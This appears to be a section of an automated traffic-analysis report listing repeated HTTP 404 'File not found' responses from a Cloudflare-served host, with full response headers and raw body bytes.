Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZoUv%2BPPJd0tVciBSgbcPpIv5el0L6VJEeaH2uI8f9bZP7FL8JtHi%2F44nIBMvebOBfZZzFWtZNDRQOTKrCEfc1RqVcsQhg6obYszclMjrrXLVEqTszQA3aETSEf3mmA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9e0eb796b6a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1185&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1No8y1topIo6w43ZP%2B8Oy%2BYX%2FEsKUWLRZb19VBQnuBsLXc0CDobIBC8dWJHtjHU5eV6TwTSnKdmfsUEo%2FK3bNHQjCOjdzbQpzRM8EOfOuOfvQDurqfwjgFZfhw%2BLbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9e7cb453abe-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky3uBCX0Z19WlgeL7AA8Tw7OtrsrpN%2FCY13aQSYHqIKMRuoDOk4KGIQMP65p0bgVmq5ztY50CKny5YTEoiBpSTk5QRI7gvpnBsQiOVo6sE93BG9fdEGhpEI679oVOA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9eecb3f6b43-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1292&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdhL7acaJ6ijpM%2Fz8d%2B1fZ20YOUDVzIFzvJQH71sOKoW3Uk6vy8FTa9RK26A4z8nv0fPEUY1DCibtBVpMnXCyHDWtTtunHTk%2FN7KtmeDDGtmNb7yPDgrlMwrUqRa9Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ad9fe1d9c2e63-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5r9M1Kxwmp06Tn%2BSlDd2Owuu0bUHoU8k%2FRiz5ZhtRpRS3JjPHDsUjdqsHu3%2B3E%2BKBIgHJdGzmxVVo7xwd4pPU1uVogjD9T9wa96I97M3URqo7YJ%2FqoIEG5aqHd8ePg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada04ae798788-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1358&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9Hoy8jUtbaNiQogpR7xBYRN4Qxa0WEHg5pB%2Fbg287JQIreEDqJcCElSurkRf0GV3uAseD2m12UdSjD4uWZN43a97I5f1tjz6YVgAxpNsMZVTU7JbisG3dKGWBefZLQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada0b5dd94743-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1120&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=105&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEeWlldJIgJjnVVY0SO26O0TfTmIXckdTrnihdrTBRhuzX5FS4qGcQrLHtrnWqxzo0rzHSNE3%2F24hFuvhLTQGBuuvuXzp5VQBLrVITaxiFBjYN%2B9fsZdePlJbC6d2w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada12ba766b82-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FRL0MJ6O1BAFldDScCQCjuc4Np8QFdXGb3rHH6ZGn6EI1HL80Gs5DaDyzC7U2AIQ4EMmyTO%2FIqK92ZxRKrE4ZGRUtAzH4XQq6Vc5xutaG59hKXXjKswA42SkvjP0LQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada1c19a06c62-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1038&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KWYQ2w75zgZFo8QaD7WFRpSfrTPXYBuKFIZxHQ5C6gWjGcRe%2FKXfB9LzwVy3hqLZJk8iMsoMUCWYZZhDVRYvHMc7LlKFBh17eYmTvwXK%2B61HMX%2BlbQ8CwXipME7JoA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada2dedc56b39-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1184&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d1%2B1Q%2Fo%2FG2QnAoJlSM0yAKKU6G3R2R5pGONJQGTP%2FyDAo0sqh5tYQl1FFInBNBi7QAjr599mfV9tHRf1Q1QTjRACFrNOTf85kNB5ENQ6cw2N4bDrZqiZ1%2FGzjSKOzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada44194f35a2-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1242&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QoJF9AMe%2FA%2B%2BSad6%2B3CyNVUbHH0zURWAvWe39GrkE4FOmChe%2FbYIAfXfH7nlf1cIWHiZiVRtoP8EbFR2zcvjEr%2F%2BRDhDqSraZ3%2F33cl7pmmo2sSZsWO37rvzbcxfow%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada4a8fd24868-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1398&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=74i3Eu8mrHpb3GPYKmVboas8SY9SUF9ej8%2BmMq1nH8G%2F9I6WLwstdvVHF4LGniTh0f2WfWV70WksH5ZOs2eQ%2FjOCgKdbluf3hEasg2worBmZgOkqPPitMHBQlhltMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada513b2ea927-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1540&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHkhOwqkAR225TjaaK3%2B5VGRcaldiYXKReieWHLBJGHDB5iu%2BVjX%2FeKTdR4v3fvD68rqTWpBeQJmhv6ACfFHSCvXQ%2B5ENF5abqaEPBDLM6z9K1Ru5e1wanLVRITgQA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada58ccaee857-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WjdKh59KaDKOs3aZ5Gi7oN9PsKZ1g9DB23k5SQBKGa288O5VBEyDksfYOwl5pfk%2BQqH8iv%2BQtkd6ZSj%2BZAD04pM873rGSjdktUen6N%2FvsMaXlwTdySB7FLcRlL%2Fssw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada60493a6b48-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2601&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URi8w8bwwL4koeUv%2FYGuYMoE7NlwBOsfD5HUCry5zBLpeTMEAKVcR8KZabIw1Cl0dUfRj4Zg%2Fz%2B0B9uTn9eHGVT66fLcK8NkORlhi3tQiZSpWZ8x0V8RChRpeV18Qg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada671d0b2fdc-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1397&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gZAKx2Yw68A5Tn2NQ8gDz%2Basu58%2BVjpuZCY%2BUfRvrZ6FR9lryFYhk39R4K4Cw%2BXnaEkQUA7Ba5u4yBJjk0e5nvnHPdV1FlcWzxP6HL8%2F10HWLt72l%2FAs17MFfFmpPw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada6dab6e6b5b-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1882&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vbomeqce6xggmjjX5oK1szsV7VWp%2FZH%2BxF81mAqghIp8ZTsvxy3cz0XKfqgqe68syYxqKu%2BRCKnWAVx3mzmefB8tadmD9V%2FHkS7N6TcLnhYV6as1gphbiukbS5PG6w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada7618dc465c-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pEKBl8uyv2kO%2FbYI7NA7EdUYBqSfE7akentiVlZFbLsptxDfBEB%2FAAVmwQmk3r2QQd0IYJKiuhD401huKJ9RwIZcAftuMrnWdneAE7Kl%2B%2FNq7yjxbwIvWXHqTtscrw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada7d3bca3ac4-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1113&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IEQo5emQw2osqdRyOMFO0Hdr%2Fx46iNWx6ruwmf%2FcWoBoGOXHQyaanl2vzOuhIyncfAmFvI5cOanErPFoHvNhwNh62Ar6KyjkcfRJvfvx4Oysm4nzrGPfPdoJvSqBLw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada8a6a234757-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1238&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53UoM9TZDZ5P4vSHYRHpQXGjB7ycjUl2WabI3sV5SzZifxyJ6fSV8B3znhxp%2BxFMUAEokx%2FtkiC80NrdZC0KuU%2BLLPcVAB72HjCa2v%2B2pOKp8I12CIVY6Pal2iAMBw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7ada9f98eae96e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1401&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nIPXRH24tmkWLVMfYjNnVn7AP2DtbRqy8%2F9aCwnTmm6COYwuiN%2F6n5bJQEnJ7qi6L%2FlLTYiOqn%2BCE%2Btbbh1yyfharJrZvxVdQuCKwphs6itfy6Gr3O51rgyFMJ74RA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaa71fe43ad0-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1321&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=74&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9OHuJdcwKj988xBjxnpLVZjMYvLyH1fDaGolI%2B7Qp3DWekDJug6sgjzSSudcwX2nE2EoWgx7BFZBiUdz2WND9wLIWmrGUuTjKQtPOig7dBAuota3lvqvGmlY2AiPQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adaadeb1ee926-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1106&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FhJXDEKBhNkC%2Bgvm8EJsAvNS0%2FLPpSAwULwrWuA01NlXDJgqyDLZl88kGprTU8DOW5IfQGSHptGIhLrXQIMUtCysnlxF%2FRpMYbQhD%2FB6sDDEHh%2B%2FmrcNWF3A2sfA%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adab589bf478a-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1290&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ec4v7cdsj9R7lJkSwshjm2sBzz0Yi3SqhlCd2dYWVSmxitBjtqDvl7McAuTUCe6SWa6zlUHaW3PBNhDVhPvAOko1%2BVHDFaKEbxEaLgB77mV%2Fk9D4fiUPkdtIIBygsg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adabf6a15e82f-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1457&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LLaykezu7Zz0z2O%2FoypISLitca3YiOdR%2FRaPUBmpn10UxgXOQ2%2FEc1RI72cUF7DXb%2BsUDvZ%2BOQiibwkWN%2FQ8QvMxSJSxJX3keTyIBHxe1SLhp0js7Nga3F2nb5pbDQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adacad8aaead9-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1331&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 15:03:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not Foundcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aokre7JlNsIawmJyupBwGeDMFWPy9J4ZT2d4CbPbHagYmspz8noRggwSRTKFUu0yLZ73kcgkmvx4bs1Gvi9faLl6UYZJX3d%2B8oIYmzPS31LwB4HrPFyAlycRod0%2F%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7adad7af6a4774-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1093&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
